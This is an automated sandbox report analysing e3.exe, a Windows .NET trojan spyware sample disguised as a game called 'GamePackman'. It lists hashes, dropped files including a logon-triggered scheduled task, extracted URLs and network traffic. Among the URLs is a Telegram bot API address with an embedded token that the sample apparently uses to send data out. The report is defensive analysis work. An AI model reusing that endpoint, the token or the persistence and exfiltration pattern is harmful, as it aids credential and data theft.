                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sakkal.come3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipe3.exe, 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, e3.exe, 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.orgD8e3.exe, 00000004.00000002.641057678.0000000003188000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.come3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://DynDns.comDynDNSe3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hae3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.ipify.org4e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.carterandcone.comte3.exe, 00000000.00000003.375281806.00000000057D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.micSe3.exe, 00000004.00000002.643087096.00000000075C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://QRkfxD.come3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.carterandcone.comle3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.founder.com.cn/cn/e3.exe, 00000000.00000003.374292518.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374245797.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374267240.00000000057CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNe3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/e3.exe, 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, e3.exe, 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cne3.exe, 00000000.00000003.374775375.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374974192.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374927044.00000000057CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmle3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.zhongyicts.com.cnae3.exe, 00000000.00000003.375200245.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.375281806.00000000057D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.comme3.exe, 00000000.00000002.413430476.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://8fOOnocu1ayHdFsuv.come3.exe, 00000004.00000002.640880683.0000000003172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers8e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cnht#e3.exe, 00000000.00000003.374704455.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374775375.00000000057CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://api.telegram.orge3.exe, 00000004.00000002.641057678.0000000003188000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.641346109.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.typography.nethe3.exe, 00000000.00000003.373651905.00000000057B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUfalse
                                                          52.20.78.240
                                                          api.ipify.org.herokudns.comUnited States
                                                          14618AMAZON-AESUSfalse
                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:626044
                                                          Start date and time: 13/05/202214:32:092022-05-13 14:32:09 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 30s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:e3.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@6/4@5/2
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          TimeTypeDescription
                                                          14:33:29API Interceptor594x Sleep call for process: e3.exe modified
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\e3.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1393
                                                          Entropy (8bit):5.336387678668898
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84F0:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz4
                                                          MD5:918F04BB59A8331CBEAD9305F6A98022
                                                          SHA1:DC143AF1885A9FD5964AE0CD2C0C9248459D69FA
                                                          SHA-256:89CAD35E7AB95E575A209A676E91D005B1E1342D172F9559CA47D9617A9DE6DB
                                                          SHA-512:B31C671F3CAAE013679DF07D191AAC2902EC052313601715C1FA44D63925931F610089E02E5D405A5ED337809ED227B5C0A2B88C9F06234DA4EBA27B1446DD7A
                                                          Malicious:true
                                                          Reputation:moderate, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                          Process:C:\Users\user\Desktop\e3.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1657
                                                          Entropy (8bit):5.159204241461741
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3Ftn:cbha7JlNQV/rydbz9I3YODOLNdq3h
                                                          MD5:437C29D81E3D7481372679C35849C294
                                                          SHA1:70F1CE861CB52E6F7313DF1083BA11C5A61C9F6D
                                                          SHA-256:0157FC55892E7C7A83655E0A1084D3404F6232975137C692A5C4C84E09CA97F9
                                                          SHA-512:D879A9A482C6DF51E1C6138F349BEBAB9A356AD0204ECAC5AA5D091454FC5DE33B86F72C6A578DB927B0D7EAEDE37E89F86DD2EB4D6D84FCC816A9CC040E31CA
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                          Process:C:\Users\user\Desktop\e3.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):562176
                                                          Entropy (8bit):7.092566652819177
                                                          Encrypted:false
                                                          SSDEEP:6144:YLhbjwBf7/ERJLjjJGyU0H/+FfVD7yE6U7ZOKfnFjcSZQrIAVh5nwAIINvuy/7l3:sb8Bfw3j8Y/nTFyZu5nwAIIN57lPf
                                                          MD5:E37F62C85961B9502A0D1599C37E390C
                                                          SHA1:1135F2EE15AD11129B07E784E344B16ACF07B612
                                                          SHA-256:63376E3E129B0513BAEC3A001A0BCC80ED859D0B4C347FD4491ADD3F54DCCFAF
                                                          SHA-512:F65F7101766F3353631AF029F342D4A89EF6AB6F265263E5FFDBAD7301F216E4866C8E0BA9B9006EBB2A6DAC4D9F20A3051ADBFE48EEE24E6E2A028DF80B5098
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 73%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........E...1......h....v...$...........................................0..O.........s......8 .....o......r...po......,+..s....}.......r...po.....Xo.......}.....+....}......s....}.......4...%..].o............+j............4...%.N...(....o........~....(........,/..{...........,..{......o ....+..{......o .........X.......i2..{.....3..{....o!......+......,....{....o"......{....o".......o#..........:........,..o$.....*.A...........;...C............0............s......8......o...
                                                          Process:C:\Users\user\Desktop\e3.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6951152985249047
                                                          Encrypted:false
                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                          MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                          SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                          SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                          SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.092566652819177
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:e3.exe
                                                          File size:562176
                                                          MD5:e37f62c85961b9502a0d1599c37e390c
                                                          SHA1:1135f2ee15ad11129b07e784e344b16acf07b612
                                                          SHA256:63376e3e129b0513baec3a001a0bcc80ed859d0b4c347fd4491add3f54dccfaf
                                                          SHA512:f65f7101766f3353631af029f342d4a89ef6ab6f265263e5ffdbad7301f216e4866c8e0ba9b9006ebb2a6dac4d9f20a3051adbfe48eee24e6e2a028df80b5098
                                                          SSDEEP:6144:YLhbjwBf7/ERJLjjJGyU0H/+FfVD7yE6U7ZOKfnFjcSZQrIAVh5nwAIINvuy/7l3:sb8Bfw3j8Y/nTFyZu5nwAIIN57lPf
                                                          TLSH:AFC44AF89346E66BCD4F013FA84A7D21E286DB66C6ED458543D4B03D17FD30A6A9088F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0.................. ........@.. ....................................@................................
                                                          Icon Hash:00828e8e8686b000
                                                          Entrypoint:0x489bfa
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x5F9C1412 [Fri Oct 30 13:24:34 2020 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          pop ebx
                                                          add byte ptr [eax], ah
                                                          add byte ptr [ebp+00h], bl
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x89ba80x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x59c.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x889980x88a00False0.730000571821data7.0947987409IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x8c0000x59c0x600False0.419270833333data4.06586604762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x8e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0x8c0900x30cdata
                                                          RT_MANIFEST0x8c3ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          DLLImport
                                                          mscoree.dll_CorExeMain
                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyrightCopyright 2017
                                                          Assembly Version1.0.0.0
                                                          InternalNamea.exe
                                                          FileVersion1.0.0.0
                                                          CompanyName
                                                          LegalTrademarks
                                                          Comments
                                                          ProductNameGamePackman
                                                          ProductVersion1.0.0.0
                                                          FileDescriptionGamePackman
                                                          OriginalFilenamea.exe
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 13, 2022 14:35:14.129980087 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:14.130018950 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:14.130119085 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:14.207613945 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:14.207645893 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:14.281173944 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:14.281322956 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:14.292911053 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:14.292924881 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:14.293410063 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:14.450351954 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.115175009 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.115246058 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.115329981 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.115838051 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.115864992 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.345293999 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.381727934 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:16.383892059 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.383979082 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:16.384102106 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.384164095 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:16.384268999 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.384423971 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:16.409259081 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.409337044 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.412358046 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.412385941 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.412767887 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.415760040 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.456526041 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.631582022 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:16.631674051 CEST44349848149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:16.631752968 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.634371996 CEST49848443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:16.639564991 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.639960051 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.640016079 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:16.640024900 CEST4434984952.20.78.240192.168.2.6
                                                          May 13, 2022 14:35:16.640068054 CEST49849443192.168.2.652.20.78.240
                                                          May 13, 2022 14:35:22.725140095 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:22.725219011 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.725409985 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:22.725972891 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:22.726005077 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.783929110 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.787491083 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:22.787529945 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.837359905 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.839344978 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:22.839378119 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.983386040 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.983526945 CEST44349850149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:22.983740091 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:22.985307932 CEST49850443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:23.976937056 CEST49851443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:23.976972103 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:23.977049112 CEST49851443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:23.977634907 CEST49851443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:23.977660894 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.034434080 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.036840916 CEST49851443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:24.036873102 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.088830948 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.089447975 CEST49851443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:24.089483023 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.250555992 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.250659943 CEST44349851149.154.167.220192.168.2.6
                                                          May 13, 2022 14:35:24.250731945 CEST49851443192.168.2.6149.154.167.220
                                                          May 13, 2022 14:35:24.251410961 CEST49851443192.168.2.6149.154.167.220
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 13, 2022 14:35:13.999356031 CEST6036153192.168.2.68.8.8.8
                                                          May 13, 2022 14:35:14.018157959 CEST53603618.8.8.8192.168.2.6
                                                          May 13, 2022 14:35:16.022170067 CEST6377153192.168.2.68.8.8.8
                                                          May 13, 2022 14:35:16.042714119 CEST53637718.8.8.8192.168.2.6
